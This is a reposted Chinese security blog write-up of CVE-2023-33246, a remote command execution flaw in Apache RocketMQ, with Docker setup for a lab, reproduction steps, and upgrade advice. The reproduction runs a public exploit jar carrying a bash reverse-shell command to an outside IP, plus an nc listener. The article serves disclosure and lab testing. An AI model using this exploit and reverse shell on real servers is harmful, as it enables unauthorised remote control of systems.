漏洞速递| CVE-2023-33246 RCE漏洞(附EXP)
2023-6-9 23:24:26 Author: 渗透Xiao白帽(查看原文) 阅读量:34 收藏

0x01 前言

RocketMQ是阿里巴巴在2012年开发的分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点

0x02 漏洞描述

在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。

0x03 影响版本

Apache RocketMQ <= 5.1.0Apache RocketMQ <= 4.9.5

0x04 环境搭建

本次直接用docker拉取漏洞环境。
下载docker镜像:docker pull apache/rocketmq:4.9.1docker pull apacherocketmq/rocketmq-console:2.0.0

启动namesrv:docker run -d -p 9876:9876 -v /data/namesrv/logs:/root/logs -v /data/namesrv/store:/root/store --name rmqnamesrv -e "MAX_POSSIBLE_HEAP=100000000" apache/rocketmq:4.9.1 sh mqnamesrv

启动broker服务(先创建并配置broker文件)

创建broker文件目录mkdir -p /NDTSec/rocketmq/conf/配置broker文件vim /NDTSec/rocketmq/conf/broker.conf
将下面内容复制粘贴到broker.conf配置文件中:brokerClusterName = DefaultCluster brokerName = broker-a brokerId = 0 deleteWhen = 04 fileReservedTime = 48 brokerRole = ASYNC_MASTER flushDiskType = SYNC_FLUSH

启动broker:
docker run -d -p 10911:10911 -p 10909:10909 -v /data/broker/logs:/root/logs -v /data/broker/store:/root/store -v /NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -e "MAX_POSSIBLE_HEAP=200000000" apache/rocketmq:4.9.1 sh mqbroker -c /opt/rocketmq/conf/broker.conf

启动console:
docker run -d --name rmqconsole -p 8899:8080 --link rmqnamesrv:namesrv\ -e "JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876\ -Dcom.rocketmq.sendMessageWithVIPChannel=false"\ -t apacherocketmq/rocketmq-console:2.0.0

环境搭建成功!

0x05 漏洞复现

环境搭建成功页面是这个酱紫

直接利用Github上大佬写好的工具反弹shell:

https:Serendipity-Lucky/CVE-2023-33246

java -jar CVE-2023-33246.jar -ip "1.1.1.1" -cmd "bash -i >& /dev/tcp/4.4.4.4/1122 0>&1"

PS:自己本地测试的时候,反弹shell的ip不能与docker启动环境的ip一样,不然接收不到shell

NC监听

nc -lvnp 1122

0x06 修复方案

目前官方已发布安全修复更新,受影响用户可以升级到 Apache RocketMQ 5.1.1或者4.9.6建议及时更新至最新版本

文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247497890&idx=1&sn=2ec08e646f4535d3fbbf0ce4c9ed604b&chksm=ea3407f8dd438eee07cb601270106ae139f3c8c8fbfd5b16f1e85ea3cb45d933fa094d2a6ca7#rd
如有侵权请联系:admin#unsafe.sh